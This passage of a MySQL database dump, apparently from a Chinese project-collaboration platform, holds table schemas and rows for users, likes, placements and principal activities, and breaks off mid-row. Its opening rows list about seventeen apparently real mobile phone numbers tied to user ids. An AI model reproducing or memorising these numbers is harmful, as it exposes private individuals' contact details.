06:02:58','2021-03-10 06:02:58'),(374,'13418684653','2021-03-10 06:02:58','2021-03-10 06:02:58'),(375,'13041186134','2021-03-10 06:02:58','2021-03-10 06:02:58'),(376,'15957177409','2021-03-10 06:02:58','2021-03-10 06:02:58'),(377,'18284572692','2021-03-10 06:02:58','2021-03-10 06:02:58'),(378,'17791635554','2021-03-10 06:02:58','2021-03-10 06:02:58'),(379,'13172043623','2021-03-10 06:02:58','2021-03-10 06:02:58'),(380,'18281511058','2021-03-10 06:02:58','2021-03-10 06:02:58'),(381,'13182035953','2021-03-10 06:02:58','2021-03-10 06:02:58'),(382,'13551069527','2021-03-10 06:02:58','2021-03-10 06:02:58'),(383,'17719581755','2021-03-10 06:02:58','2021-03-10 06:02:58'),(384,'13817567047','2021-03-10 06:02:58','2021-03-10 06:02:58'),(385,'18851655399','2021-03-10 06:02:58','2021-03-10 06:02:58'),(386,'18880816114','2021-03-10 06:02:58','2021-03-10 06:02:58'),(387,'18883340567','2021-03-10 06:02:58','2021-03-10 06:02:58'),(388,'17766521031','2021-03-10 06:02:58','2021-03-10 06:02:58'),(389,'15910678199','2021-03-10 06:02:58','2021-03-10 06:02:58'),(390,'18616122696','2021-03-10 06:02:58','2021-03-10 06:02:58');
|
||
/*!40000 ALTER TABLE `phenglei_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `phone_app_versions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `phone_app_versions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `phone_app_versions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`version` varchar(255) DEFAULT NULL,
|
||
`description` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `phone_app_versions`
|
||
--
|
||
|
||
LOCK TABLES `phone_app_versions` WRITE;
|
||
/*!40000 ALTER TABLE `phone_app_versions` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `phone_app_versions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `placements`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `placements`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `placements` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`users_count` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_placements_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `placements`
|
||
--
|
||
|
||
LOCK TABLES `placements` WRITE;
|
||
/*!40000 ALTER TABLE `placements` DISABLE KEYS */;
|
||
INSERT INTO `placements` VALUES (1,'普通员工','2019-08-05 16:00:06','2019-08-05 16:00:06',0);
|
||
/*!40000 ALTER TABLE `placements` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `praise_tread_caches`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `praise_tread_caches`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `praise_tread_caches` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`object_id` int(11) NOT NULL,
|
||
`object_type` varchar(255) DEFAULT NULL,
|
||
`praise_num` int(11) DEFAULT NULL,
|
||
`tread_num` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `praise_tread_caches`
|
||
--
|
||
|
||
LOCK TABLES `praise_tread_caches` WRITE;
|
||
/*!40000 ALTER TABLE `praise_tread_caches` DISABLE KEYS */;
|
||
INSERT INTO `praise_tread_caches` VALUES (2,56,'Issue',1,NULL,'2019-08-23 15:09:41','2019-08-23 15:09:41'),(3,68,'Journal',1,NULL,'2019-10-23 16:15:41','2019-10-23 16:15:41'),(10,100,'Issue',1,NULL,'2019-11-22 09:23:26','2019-11-22 09:23:26'),(11,126,'Journal',1,NULL,'2019-11-22 09:23:29','2019-11-22 09:23:29'),(14,131,'Journal',1,NULL,'2019-11-22 10:47:58','2019-11-22 10:47:58');
|
||
/*!40000 ALTER TABLE `praise_tread_caches` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `praise_treads`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `praise_treads`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `praise_treads` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL,
|
||
`praise_tread_object_id` int(11) DEFAULT NULL,
|
||
`praise_tread_object_type` varchar(255) DEFAULT NULL,
|
||
`praise_or_tread` int(11) DEFAULT '1',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `praise_tread` (`praise_tread_object_id`,`praise_tread_object_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=270 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `praise_treads`
|
||
--
|
||
|
||
LOCK TABLES `praise_treads` WRITE;
|
||
/*!40000 ALTER TABLE `praise_treads` DISABLE KEYS */;
|
||
INSERT INTO `praise_treads` VALUES (1,1,21,'Memo',1,'2018-07-10 11:28:59','2018-07-10 11:28:59'),(10,1,2,'Memo',1,'2018-07-19 10:44:17','2018-07-19 10:44:17'),(20,1,97,'Memo',1,'2018-08-07 16:28:17','2018-08-07 16:28:17'),(21,5,123,'Memo',1,'2018-08-10 09:20:26','2018-08-10 09:20:26'),(23,10,143,'Memo',1,'2018-08-25 09:38:18','2018-08-25 09:38:18'),(24,9,160,'Memo',1,'2018-11-13 11:28:00','2018-11-13 11:28:00'),(27,46,182,'Memo',1,'2019-08-07 09:02:18','2019-08-07 09:02:18'),(54,50,183,'Memo',1,'2019-08-09 09:04:45','2019-08-09 09:04:45'),(87,49,15,'Memo',1,'2019-08-09 11:14:41','2019-08-09 11:14:41'),(91,49,183,'Memo',1,'2019-08-10 10:44:39','2019-08-10 10:44:39'),(95,50,230,'Memo',1,'2019-08-15 15:01:09','2019-08-15 15:01:09'),(96,50,56,'Issue',1,'2019-08-23 15:09:41','2019-08-23 15:09:41'),(98,50,15,'Memo',1,'2019-09-29 10:30:47','2019-09-29 10:30:47'),(101,50,240,'Memo',1,'2019-09-30 09:52:13','2019-09-30 09:52:13'),(102,49,236,'Memo',1,'2019-10-08 10:41:48','2019-10-08 10:41:48'),(103,46,68,'Journal',1,'2019-10-23 16:15:41','2019-10-23 16:15:41'),(104,66,240,'Memo',1,'2019-11-11 17:11:31','2019-11-11 17:11:31'),(105,50,21,'Memo',1,'2019-11-12 14:55:37','2019-11-12 14:55:37'),(108,49,238,'Memo',1,'2019-11-14 17:29:28','2019-11-14 17:29:28'),(115,46,100,'Issue',1,'2019-11-22 09:23:26','2019-11-22 09:23:26'),(116,46,126,'Journal',1,'2019-11-22 09:23:29','2019-11-22 09:23:29'),(119,46,131,'Journal',1,'2019-11-22 10:47:58','2019-11-22 10:47:58'),(125,75,281,'Memo',1,'2020-02-02 10:17:37','2020-02-02 10:17:37'),(134,1,280,'Memo',1,'2020-06-16 16:04:43','2020-06-16 16:04:43'),(135,1,283,'Memo',1,'2020-06-16 16:04:52','2020-06-16 16:04:52'),(136,111,287,'Memo',1,'2020-07-08 17:52:49','2020-07-08 17:52:49'),(137,111,289,'Memo',1,'2020-07-08 17:52:57','2020-07-08 17:52:57'),(138,111,271,'Memo',1,'2020-07-12 10:42:57','2020-07-12 10:42:57'),(139,111,273,'Memo',1,'2020-07-12 10:59:49','2020-07-12 10:59:49'),(140,111,178,'Memo',1,'2020-07-28 11:41:10','2020-07-28 11:41:10'),(159,47,183,'Memo',1,'2020-08-19 09:26:08','2020-08-19 09:26:08'),(160,47,236,'Memo',1,'2020-08-19 09:43:43','2020-08-19 09:43:43'),(202,47,240,'Memo',1,'2020-08-25 14:04:54','2020-08-25 14:04:54'),(204,46,241,'Memo',1,'2020-08-25 16:23:38','2020-08-25 16:23:38'),(208,47,343,'Memo',1,'2020-08-25 18:22:47','2020-08-25 18:22:47'),(210,47,241,'Memo',1,'2020-08-25 18:27:58','2020-08-25 18:27:58'),(217,47,4,'Memo',1,'2020-08-27 14:01:53','2020-08-27 14:01:53'),(219,46,376,'Project',1,'2020-08-27 09:00:42','2020-08-27 09:00:42'),(224,115,240,'Memo',1,'2020-09-03 08:28:09','2020-09-03 08:28:09'),(226,111,4,'Memo',1,'2020-09-03 14:20:29','2020-09-03 14:20:29'),(229,63,21,'Memo',1,'2020-09-15 08:29:44','2020-09-15 08:29:44'),(232,46,357,'Memo',1,'2020-09-15 09:05:19','2020-09-15 09:05:19'),(233,46,356,'Memo',1,'2020-09-15 09:05:45','2020-09-15 09:05:45'),(234,46,345,'Memo',1,'2020-09-15 09:05:49','2020-09-15 09:05:49'),(235,46,344,'Memo',1,'2020-09-15 09:05:59','2020-09-15 09:05:59'),(254,137,480,'Project',1,'2021-01-28 08:24:51','2021-01-28 08:24:51'),(256,120,477,'Project',1,'2021-01-28 08:32:29','2021-01-28 08:32:29'),(257,156,477,'Project',1,'2021-01-28 08:32:44','2021-01-28 08:32:44'),(258,46,477,'Project',1,'2021-01-28 09:17:26','2021-01-28 09:17:26'),(259,121,477,'Project',1,'2021-01-28 14:08:57','2021-01-28 14:08:57'),(260,152,477,'Project',1,'2021-01-28 14:11:28','2021-01-28 14:11:28'),(261,160,477,'Project',1,'2021-01-28 15:41:45','2021-01-28 15:41:45'),(263,49,494,'Project',1,'2021-02-22 08:33:10','2021-02-22 08:33:10'),(264,162,477,'Project',1,'2021-02-22 13:21:07','2021-02-22 13:21:07'),(265,182,496,'Project',1,'2021-02-25 01:18:07','2021-02-25 01:18:07'),(267,165,477,'Project',1,'2021-03-06 08:45:14','2021-03-06 08:45:14'),(268,175,477,'Project',1,'2021-03-09 08:05:07','2021-03-09 08:05:07'),(269,190,517,'Project',1,'2021-03-09 08:27:40','2021-03-09 08:27:40');
|
||
/*!40000 ALTER TABLE `praise_treads` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `principal_activities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `principal_activities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `principal_activities` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`principal_id` int(11) DEFAULT NULL,
|
||
`principal_act_id` int(11) DEFAULT NULL,
|
||
`principal_act_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=221 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `principal_activities`
|
||
--
|
||
|
||
LOCK TABLES `principal_activities` WRITE;
|
||
/*!40000 ALTER TABLE `principal_activities` DISABLE KEYS */;
|
||
INSERT INTO `principal_activities` VALUES (1,1,1,1,'Principal','2018-07-02 11:21:08','2018-07-02 11:21:08'),(2,2,2,2,'Principal','2018-07-02 11:27:49','2018-07-02 11:27:49'),(3,3,3,3,'Principal','2018-07-06 10:52:18','2018-07-06 10:52:18'),(4,4,4,4,'Principal','2018-07-08 10:28:20','2018-07-08 10:28:20'),(5,5,5,5,'Principal','2018-07-20 09:16:40','2018-07-20 09:16:40'),(6,6,6,6,'Principal','2018-07-20 14:47:43','2018-07-20 14:47:43'),(7,7,7,7,'Principal','2018-07-30 09:39:16','2018-07-30 09:39:16'),(8,8,8,8,'Principal','2018-08-03 19:28:18','2018-08-03 19:28:18'),(9,9,9,9,'Principal','2018-08-06 15:18:46','2018-08-06 15:18:46'),(10,10,10,10,'Principal','2018-08-06 15:24:58','2018-08-06 15:24:58'),(11,11,11,11,'Principal','2018-08-21 17:13:35','2018-08-21 17:13:35'),(12,12,12,12,'Principal','2018-08-22 15:59:03','2018-08-22 15:59:03'),(13,13,13,13,'Principal','2018-08-30 22:28:07','2018-08-30 22:28:07'),(14,14,14,14,'Principal','2018-09-05 13:54:44','2018-09-05 13:54:44'),(15,15,15,15,'Principal','2018-09-07 12:37:19','2018-09-07 12:37:19'),(16,16,16,16,'Principal','2018-10-10 09:29:20','2018-10-10 09:29:20'),(17,17,17,17,'Principal','2018-10-12 17:36:42','2018-10-12 17:36:42'),(18,18,18,18,'Principal','2018-12-19 09:06:30','2018-12-19 09:06:30'),(19,19,19,19,'Principal','2019-01-15 09:36:50','2019-01-15 09:36:50'),(20,20,20,20,'Principal','2019-01-18 09:54:22','2019-01-18 09:54:22'),(21,21,21,21,'Principal','2019-01-25 11:44:49','2019-01-25 11:44:49'),(22,22,22,22,'Principal','2019-01-25 11:44:49','2019-01-25 11:44:49'),(23,23,23,23,'Principal','2019-01-25 11:44:49','2019-01-25 11:44:49'),(24,24,24,24,'Principal','2019-01-25 11:44:49','2019-01-25 11:44:49'),(25,25,25,25,'Principal','2019-01-25 11:44:50','2019-01-25 11:44:50'),(26,26,26,26,'Principal','2019-01-25 11:44:50','2019-01-25 11:44:50'),(27,27,27,27,'Principal','2019-01-25 11:44:50','2019-01-25 11:44:50'),(28,28,28,28,'Principal','2019-01-25 11:44:50','2019-01-25 11:44:50'),(29,29,29,29,'Principal','2019-01-25 11:44:50','2019-01-25 11:44:50'),(30,30,30,30,'Principal','2019-01-25 11:44:50','2019-01-25 11:44:50'),(31,31,31,31,'Principal','2019-03-13 16:32:19','2019-03-13 16:32:19'),(32,32,32,32,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(33,33,33,33,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(34,34,34,34,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(35,35,35,35,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(36,36,36,36,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(37,37,37,37,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(38,38,38,38,'Principal','2019-03-13 16:32:20','2019-03-13 16:32:20'),(39,39,39,39,'Principal','2019-03-13 16:32:21','2019-03-13 16:32:21'),(40,40,40,40,'Principal','2019-03-13 16:32:21','2019-03-13 16:32:21'),(41,41,41,41,'Principal','2019-03-21 21:28:44','2019-03-21 21:28:44'),(42,42,42,42,'Principal','2019-04-09 15:27:41','2019-04-09 15:27:41'),(43,43,43,43,'Principal','2019-04-17 09:49:36','2019-04-17 09:49:36'),(44,44,44,44,'Principal','2019-04-18 11:06:17','2019-04-18 11:06:17'),(45,45,45,45,'Principal','2019-06-09 11:31:04','2019-06-09 11:31:04'),(46,46,46,46,'Principal','2019-08-06 08:33:43','2019-08-06 08:33:43'),(47,47,47,47,'Principal','2019-08-06 09:10:25','2019-08-06 09:10:25'),(48,48,48,48,'Principal','2019-08-06 09:24:30','2019-08-06 09:24:30'),(49,49,49,49,'Principal','2019-08-07 09:33:05','2019-08-07 09:33:05'),(50,50,50,50,'Principal','2019-08-07 09:37:08','2019-08-07 09:37:08'),(51,51,51,51,'Principal','2019-08-07 14:53:28','2019-08-07 14:53:28'),(52,52,52,52,'Principal','2019-08-07 15:44:39','2019-08-07 15:44:39'),(53,53,53,53,'Principal','2019-08-13 09:30:25','2019-08-13 09:30:25'),(54,54,54,54,'Principal','2019-08-14 16:50:06','2019-08-14 16:50:06'),(55,55,55,55,'Principal','2019-08-17 08:59:42','2019-08-17 08:59:42'),(56,56,56,56,'Principal','2019-09-16 09:59:25','2019-09-16 09:59:25'),(57,57,57,57,'Principal','2019-10-10 16:48:10','2019-10-10 16:48:10'),(58,58,58,58,'Principal','2019-10-19 09:24:20','2019-10-19 09:24:20'),(60,60,60,60,'Principal','2019-10-29 10:00:26','2019-10-29 10:00:26'),(61,61,61,61,'Principal','2019-10-29 17:07:24','2019-10-29 17:07:24'),(62,62,62,62,'Principal','2019-10-29 17:08:25','2019-10-29 17:08:25'),(63,63,63,63,'Principal','2019-10-31 18:37:10','2019-10-31 18:37:10'),(64,64,64,64,'Principal','2019-10-31 18:37:10','2019-10-31 18:37:10'),(65,65,65,65,'Principal','2019-10-31 18:37:10','2019-10-31 18:37:10'),(66,66,66,66,'Principal','2019-10-31 18:37:10','2019-10-31 18:37:10'),(67,67,67,67,'Principal','2019-10-31 18:37:10','2019-10-31 18:37:10'),(68,68,68,68,'Principal','2019-10-31 18:37:11','2019-10-31 18:37:11'),(69,69,69,69,'Principal','2019-10-31 18:37:11','2019-10-31 18:37:11'),(70,70,70,70,'Principal','2019-10-31 18:37:11','2019-10-31 18:37:11'),(71,71,71,71,'Principal','2019-10-31 18:37:11','2019-10-31 18:37:11'),(73,73,73,73,'Principal','2019-11-25 11:25:31','2019-11-25 11:25:31'),(74,74,74,74,'Principal','2020-02-01 12:47:12','2020-02-01 12:47:12'),(75,75,75,75,'Principal','2020-02-01 18:52:39','2020-02-01 18:52:39'),(76,76,76,76,'Principal','2020-02-01 20:34:46','2020-02-01 20:34:46'),(77,77,77,77,'Principal','2020-02-01 22:26:36','2020-02-01 22:26:36'),(78,78,78,78,'Principal','2020-02-03 17:19:19','2020-02-03 17:19:19'),(79,79,79,79,'Principal','2020-02-04 22:00:19','2020-02-04 22:00:19'),(80,80,80,80,'Principal','2020-02-04 22:09:45','2020-02-04 22:09:45'),(81,81,81,81,'Principal','2020-02-05 10:29:30','2020-02-05 10:29:30'),(82,82,82,82,'Principal','2020-02-05 10:30:48','2020-02-05 10:30:48'),(83,83,83,83,'Principal','2020-02-05 10:31:59','2020-02-05 10:31:59'),(84,84,84,84,'Principal','2020-02-05 10:33:10','2020-02-05 10:33:10'),(85,85,85,85,'Principal','2020-02-05 10:35:26','2020-02-05 10:35:26'),(86,86,86,86,'Principal','2020-02-05 10:38:36','2020-02-05 10:38:36'),(87,87,87,87,'Principal','2020-02-05 10:39:59','2020-02-05 10:39:59'),(88,88,88,88,'Principal','2020-02-05 10:43:18','2020-02-05 10:43:18'),(89,89,89,89,'Principal','2020-02-05 10:54:45','2020-02-05 10:54:45'),(90,90,90,90,'Principal','2020-02-05 10:54:48','2020-02-05 10:54:48'),(91,91,91,91,'Principal','2020-02-05 10:55:15','2020-02-05 10:55:15'),(92,92,92,92,'Principal','2020-02-05 10:56:00','2020-02-05 10:56:00'),(93,93,93,93,'Principal','2020-02-05 10:58:38','2020-02-05 10:58:38'),(94,94,94,94,'Principal','2020-02-05 11:02:30','2020-02-05 11:02:30'),(95,95,95,95,'Principal','2020-02-05 11:05:02','2020-02-05 11:05:02'),(96,96,96,96,'Principal','2020-02-05 11:24:55','2020-02-05 11:24:55'),(97,97,97,97,'Principal','2020-02-05 11:41:14','2020-02-05 11:41:14'),(98,98,98,98,'Principal','2020-02-05 12:24:57','2020-02-05 12:24:57'),(99,99,99,99,'Principal','2020-02-05 14:48:32','2020-02-05 14:48:32'),(100,100,100,100,'Principal','2020-02-05 14:53:15','2020-02-05 14:53:15'),(101,101,101,101,'Principal','2020-02-05 15:22:57','2020-02-05 15:22:57'),(102,102,102,102,'Principal','2020-02-05 16:25:27','2020-02-05 16:25:27'),(103,103,103,103,'Principal','2020-02-10 12:21:33','2020-02-10 12:21:33'),(104,104,104,104,'Principal','2020-03-19 13:54:38','2020-03-19 13:54:38'),(105,105,105,105,'Principal','2020-03-19 15:08:51','2020-03-19 15:08:51'),(106,106,106,106,'Principal','2020-03-19 15:09:00','2020-03-19 15:09:00'),(107,107,107,107,'Principal','2020-03-19 15:10:11','2020-03-19 15:10:11'),(108,108,108,108,'Principal','2020-03-19 15:12:55','2020-03-19 15:12:55'),(109,109,109,109,'Principal','2020-03-19 15:13:24','2020-03-19 15:13:24'),(110,110,110,110,'Principal','2020-03-23 08:27:59','2020-03-23 08:27:59'),(111,111,111,111,'Principal','2020-07-03 11:51:05','2020-07-03 11:51:05'),(112,112,112,112,'Principal','2020-08-12 10:41:20','2020-08-12 10:41:20'),(113,113,113,113,'Principal','2020-08-13 10:19:02','2020-08-13 10:19:02'),(114,114,114,114,'Principal','2020-08-14 08:58:42','2020-08-14 08:58:42'),(115,113,113,113,'Principal','2020-08-18 16:36:32','2020-08-18 16:36:32'),(116,114,114,114,'Principal','2020-08-18 16:41:47','2020-08-18 16:41:47'),(117,115,115,115,'Principal','2020-08-18 16:43:47','2020-08-18 16:43:47'),(118,116,116,116,'Principal','2020-09-29 17:20:40','2020-09-29 17:20:40'),(119,117,117,117,'Principal','2020-10-21 16:47:58','2020-10-21 16:47:58'),(120,118,118,118,'Principal','2020-12-01 18:18:16','2020-12-01 18:18:16'),(121,119,119,119,'Principal','2020-12-02 13:18:32','2020-12-02 13:18:32'),(122,120,120,120,'Principal','2020-12-14 14:31:53','2020-12-14 14:31:53'),(123,121,121,121,'Principal','2020-12-16 16:06:31','2020-12-16 16:06:31'),(124,122,122,122,'Principal','2020-12-16 18:54:54','2020-12-16 18:54:54'),(125,123,123,123,'Principal','2020-12-17 10:03:56','2020-12-17 10:03:56'),(126,124,124,124,'Principal','2020-12-17 11:17:58','2020-12-17 11:17:58'),(127,125,125,125,'Principal','2020-12-17 11:22:00','2020-12-17 11:22:00'),(128,126,126,126,'Principal','2020-12-18 18:53:33','2020-12-18 18:53:33'),(129,127,127,127,'Principal','2020-12-22 19:48:05','2020-12-22 19:48:05'),(130,128,128,128,'Principal','2020-12-24 15:19:18','2020-12-24 15:19:18'),(131,129,129,129,'Principal','2020-12-27 11:43:54','2020-12-27 11:43:54'),(132,130,130,130,'Principal','2020-12-28 11:28:50','2020-12-28 11:28:50'),(133,131,131,131,'Principal','2020-12-29 11:32:47','2020-12-29 11:32:47'),(134,132,132,132,'Principal','2020-12-29 15:12:24','2020-12-29 15:12:24'),(135,133,133,133,'Principal','2020-12-29 15:21:31','2020-12-29 15:21:31'),(136,134,134,134,'Principal','2020-12-29 15:24:04','2020-12-29 15:24:04'),(137,135,135,135,'Principal','2020-12-30 10:05:30','2020-12-30 10:05:30'),(138,136,136,136,'Principal','2021-01-05 10:33:26','2021-01-05 10:33:26'),(139,137,137,137,'Principal','2021-01-05 18:41:43','2021-01-05 18:41:43'),(140,138,138,138,'Principal','2021-01-06 10:52:46','2021-01-06 10:52:46'),(141,139,139,139,'Principal','2021-01-06 11:04:59','2021-01-06 11:04:59'),(142,140,140,140,'Principal','2021-01-06 11:12:28','2021-01-06 11:12:28'),(143,141,141,141,'Principal','2021-01-06 11:21:36','2021-01-06 11:21:36'),(144,142,142,142,'Principal','2021-01-06 11:29:05','2021-01-06 11:29:05'),(145,143,143,143,'Principal','2021-01-06 11:39:56','2021-01-06 11:39:56'),(146,144,144,144,'Principal','2021-01-06 11:47:58','2021-01-06 11:47:58'),(147,145,145,145,'Principal','2021-01-06 14:02:22','2021-01-06 14:02:22'),(148,147,147,147,'Principal','2021-01-06 14:44:32','2021-01-06 14:44:32'),(149,148,148,148,'Principal','2021-01-06 14:55:47','2021-01-06 14:55:47'),(150,149,149,149,'Principal','2021-01-06 15:44:02','2021-01-06 15:44:02'),(151,150,150,150,'Principal','2021-01-06 15:49:26','2021-01-06 15:49:26'),(152,151,151,151,'Principal','2021-01-06 16:24:55','2021-01-06 16:24:55'),(153,152,152,152,'Principal','2021-01-07 15:22:44','2021-01-07 15:22:44'),(154,153,153,153,'Principal','2021-01-13 11:04:28','2021-01-13 11:04:28'),(155,155,155,155,'Principal','2021-01-22 15:35:25','2021-01-22 15:35:25'),(156,156,156,156,'Principal','2021-01-26 09:20:06','2021-01-26 09:20:06'),(157,157,157,157,'Principal','2021-01-26 18:21:59','2021-01-26 18:21:59'),(158,158,158,158,'Principal','2021-01-28 15:58:34','2021-01-28 15:58:34'),(159,159,159,159,'Principal','2021-01-28 18:25:26','2021-01-28 18:25:26'),(160,160,160,160,'Principal','2021-01-28 23:13:22','2021-01-28 23:13:22'),(161,161,161,161,'Principal','2021-02-20 09:25:50','2021-02-20 09:25:50'),(162,162,162,162,'Principal','2021-02-20 09:26:02','2021-02-20 09:26:02'),(163,163,163,163,'Principal','2021-02-20 09:32:11','2021-02-20 09:32:11'),(164,164,164,164,'Principal','2021-02-20 09:37:17','2021-02-20 09:37:17'),(165,165,165,165,'Principal','2021-02-20 09:43:55','2021-02-20 09:43:55'),(166,166,166,166,'Principal','2021-02-20 09:44:37','2021-02-20 09:44:37'),(167,167,167,167,'Principal','2021-02-20 09:48:10','2021-02-20 09:48:10'),(168,168,168,168,'Principal','2021-02-20 09:58:39','2021-02-20 09:58:39'),(169,169,169,169,'Principal','2021-02-20 10:13:41','2021-02-20 10:13:41'),(170,170,170,170,'Principal','2021-02-20 10:34:58','2021-02-20 10:34:58'),(171,171,171,171,'Principal','2021-02-20 10:41:53','2021-02-20 10:41:53'),(172,172,172,172,'Principal','2021-02-20 11:02:04','2021-02-20 11:02:04'),(173,173,173,173,'Principal','2021-02-20 13:26:02','2021-02-20 13:26:02'),(174,174,174,174,'Principal','2021-02-20 14:13:02','2021-02-20 14:13:02'),(175,175,175,175,'Principal','2021-02-20 14:22:15','2021-02-20 14:22:15'),(176,176,176,176,'Principal','2021-02-20 19:46:55','2021-02-20 19:46:55'),(177,177,177,177,'Principal','2021-02-21 14:02:22','2021-02-21 14:02:22'),(178,178,178,178,'Principal','2021-02-22 22:36:59','2021-02-22 22:36:59'),(179,179,179,179,'Principal','2021-02-24 14:52:38','2021-02-24 14:52:38'),(180,180,180,180,'Principal','2021-02-24 17:51:45','2021-02-24 17:51:45'),(181,181,181,181,'Principal','2021-02-25 08:42:04','2021-02-25 08:42:04'),(182,182,182,182,'Principal','2021-02-25 08:49:06','2021-02-25 08:49:06'),(183,183,183,183,'Principal','2021-02-25 14:01:00','2021-02-25 14:01:00'),(184,184,184,184,'Principal','2021-02-26 10:24:39','2021-02-26 10:24:39'),(185,185,185,185,'Principal','2021-02-26 20:15:44','2021-02-26 20:15:44'),(186,186,186,186,'Principal','2021-03-01 19:03:56','2021-03-01 19:03:56'),(187,187,187,187,'Principal','2021-03-01 22:07:13','2021-03-01 22:07:13'),(188,189,189,189,'Principal','2021-03-03 07:35:42','2021-03-03 07:35:42'),(189,190,190,190,'Principal','2021-03-04 10:12:27','2021-03-04 10:12:27'),(190,191,191,191,'Principal','2021-03-04 10:16:31','2021-03-04 10:16:31'),(191,192,192,192,'Principal','2021-03-04 10:17:21','2021-03-04 10:17:21'),(192,193,193,193,'Principal','2021-03-04 10:19:53','2021-03-04 10:19:53'),(193,194,194,194,'Principal','2021-03-04 10:19:59','2021-03-04 10:19:59'),(194,195,195,195,'Principal','2021-03-04 10:20:06','2021-03-04 10:20:06'),(195,196,196,196,'Principal','2021-03-04 10:27:32','2021-03-04 10:27:32'),(196,197,197,197,'Principal','2021-03-04 10:28:07','2021-03-04 10:28:07'),(197,198,198,198,'Principal','2021-03-04 10:29:41','2021-03-04 10:29:41'),(198,199,199,199,'Principal','2021-03-04 10:42:07','2021-03-04 10:42:07'),(199,200,200,200,'Principal','2021-03-04 11:10:46','2021-03-04 11:10:46'),(200,201,201,201,'Principal','2021-03-05 10:32:57','2021-03-05 10:32:57'),(201,202,202,202,'Principal','2021-03-05 11:23:45','2021-03-05 11:23:45'),(202,203,203,203,'Principal','2021-03-05 13:12:22','2021-03-05 13:12:22'),(203,204,204,204,'Principal','2021-03-05 14:19:55','2021-03-05 14:19:55'),(204,205,205,205,'Principal','2021-03-05 14:37:57','2021-03-05 14:37:57'),(205,206,206,206,'Principal','2021-03-05 22:04:34','2021-03-05 22:04:34'),(206,207,207,207,'Principal','2021-03-06 17:19:19','2021-03-06 17:19:19'),(207,208,208,208,'Principal','2021-03-06 17:26:16','2021-03-06 17:26:16'),(208,209,209,209,'Principal','2021-03-06 18:04:36','2021-03-06 18:04:36'),(209,210,210,210,'Principal','2021-03-06 19:56:38','2021-03-06 19:56:38'),(210,211,211,211,'Principal','2021-03-07 23:20:59','2021-03-07 23:20:59'),(211,212,212,212,'Principal','2021-03-09 16:01:16','2021-03-09 16:01:16'),(212,213,213,213,'Principal','2021-03-09 16:20:16','2021-03-09 16:20:16'),(213,214,214,214,'Principal','2021-03-09 16:43:12','2021-03-09 16:43:12'),(214,215,215,215,'Principal','2021-03-09 21:49:19','2021-03-09 21:49:19'),(215,216,216,216,'Principal','2021-03-10 18:03:19','2021-03-10 18:03:19'),(216,217,217,217,'Principal','2021-03-11 07:02:07','2021-03-11 07:02:07'),(217,218,218,218,'Principal','2021-03-11 15:05:29','2021-03-11 